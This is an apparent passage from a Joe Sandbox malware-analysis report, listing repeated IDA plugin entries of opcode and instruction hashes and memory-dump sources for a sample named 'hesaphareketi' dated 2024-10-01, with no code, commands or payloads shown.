                                        • Snapshot File: hcaresult_5_2_2add000_hesaphareketi__20241001.jbxd
                                        • Instruction ID: 5305ecc40047284a9585084905b47b075f8138963c2cc6623c046897cf54d407
                                        • Opcode Fuzzy Hash: 4bd90102859fdef0bff20db9ebe7bdd14ef31b801f88596af0f36d7543a6ea29
                                        • Instruction Fuzzy Hash: 9B11BF31B002244BDF246A79D404B2E7795EF89364F104839E806CF295DF29DEC58BC9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14a635e01501a73b3759465099251a14294f9ec726fb4308d85033874ecd517c
                                        • Instruction ID: b8b89e7ca305dcc63dd5fb0bb28c4ff69e580f87572b3b3d5325f091460b5dbd
                                        • Opcode Fuzzy Hash: 14a635e01501a73b3759465099251a14294f9ec726fb4308d85033874ecd517c
                                        • Instruction Fuzzy Hash: 30119131A002249BCF24AFB884443AE77A5EF49314B181179DC09EB201E775D982CB99
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b636575c89ad1f178833e1375de865189b860b4507299a3b49986f82505e394
                                        • Instruction ID: eba1622f2930aed41da45f9c62cddf8c0c5b4c76379766567be6e046995957c8
                                        • Opcode Fuzzy Hash: 1b636575c89ad1f178833e1375de865189b860b4507299a3b49986f82505e394
                                        • Instruction Fuzzy Hash: DD11C632F003245BEF245A75D405B6E7755EF89354F144939E806DB281EF2DCAC48BC9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4609711465.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2add000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6592cac9eef015eb6431d5c22487a84d29e2005488ea75a03fc938a079033dd
                                        • Instruction ID: f5b85dfad3362a794e9fa20e25b44b751b805fd07ba2d2261a0dd2a0d2961123
                                        • Opcode Fuzzy Hash: e6592cac9eef015eb6431d5c22487a84d29e2005488ea75a03fc938a079033dd
                                        • Instruction Fuzzy Hash: 4221A4755097C08FCB16CF24D9D4715BF71EB86214F28C5DAD84A8B697C33A940ACB62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 666256c84917d2bd7e3ad07d2a5d28d786933815fd34073d8066bf982540c327
                                        • Instruction ID: 00c44b9ebb5341c5ac1a0e1ddc6bd02cbf8ea210fcf1b5fa4ca8355a2b2f9eea
                                        • Opcode Fuzzy Hash: 666256c84917d2bd7e3ad07d2a5d28d786933815fd34073d8066bf982540c327
                                        • Instruction Fuzzy Hash: 30118276F102519BCB10AB78A88975F7BF6EF88290F144529ED09D3344EB74C9418795
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6f19a2e11e27c88843777061327fdc55d0a3e8291fd801ed756c2a820e2fb86
                                        • Instruction ID: fcc40d4801d8be08cb32d8bdbf2c310c9ad6b21c4bad61c0e7d480cd65f4333e
                                        • Opcode Fuzzy Hash: f6f19a2e11e27c88843777061327fdc55d0a3e8291fd801ed756c2a820e2fb86
                                        • Instruction Fuzzy Hash: D8016131A012258FCF21EFB9844439D77E5AB88310B181579DC09E7200E775D981CB99
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4609711465.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2add000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                        • Instruction ID: 1c108fc96ca152d03a4237915696c23ddfad618557c14a67bdfa34de386825dc
                                        • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                        • Instruction Fuzzy Hash: B011C176504680DFDB12CF14D5C4B15FF71FB84324F24C6AAD84A4B656C33AD40ACBA2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4609711465.0000000002ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ADD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2add000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 9ea05330b74d8f5c1e4fe717fee83e4de9970a0fb08861ff66b1849158c8ed9e
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: 50119DB6504680DFDB06CF14D5C4B15BFB1FB84314F24C6A9D84A4B656C33AE44ACB62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f9e050ce4b4d771997b8453c95fce4a126cc0c91746154e29a3b86e507e2292
                                        • Instruction ID: cc5aa3ea01ce5c51836013e5d62fb171845d44b5e9dcf395543b49fe0fa7fc1a
                                        • Opcode Fuzzy Hash: 9f9e050ce4b4d771997b8453c95fce4a126cc0c91746154e29a3b86e507e2292
                                        • Instruction Fuzzy Hash: 21F08B33E001708BCB218BA884D43AC7BB1EE9836071C51D7CC09EB211D375D9C2CB0A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9df5740d2c95c5a7bff7dc1e9e8243721ade0245deb7514e6bcc3cbb76b5b02c
                                        • Instruction ID: 026e759c4ba3cdae7ae2a71691ea9533dcd3142b257763b8359e96cb2cfef6d5
                                        • Opcode Fuzzy Hash: 9df5740d2c95c5a7bff7dc1e9e8243721ade0245deb7514e6bcc3cbb76b5b02c
                                        • Instruction Fuzzy Hash: A9018871A502869FCB0BFB74FA4499D7B75DF41304B1046ACC4058F295DF31590ADBC2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4610014897.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c50000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d188ec8a1f0a7d66ff6f0bc3c5d9ec34a7238a352ae6738ac872fa4dfdc3be9a
                                        • Instruction ID: c5cfc718e4e9545dcc84335b8800d2496c5a7cc897a32f28180242b2cfb87636
                                        • Opcode Fuzzy Hash: d188ec8a1f0a7d66ff6f0bc3c5d9ec34a7238a352ae6738ac872fa4dfdc3be9a
                                        • Instruction Fuzzy Hash: C9F0FB319401099FCB0AFBB4FA8499D7BBAEB40304F50456884089B258EE306E099B92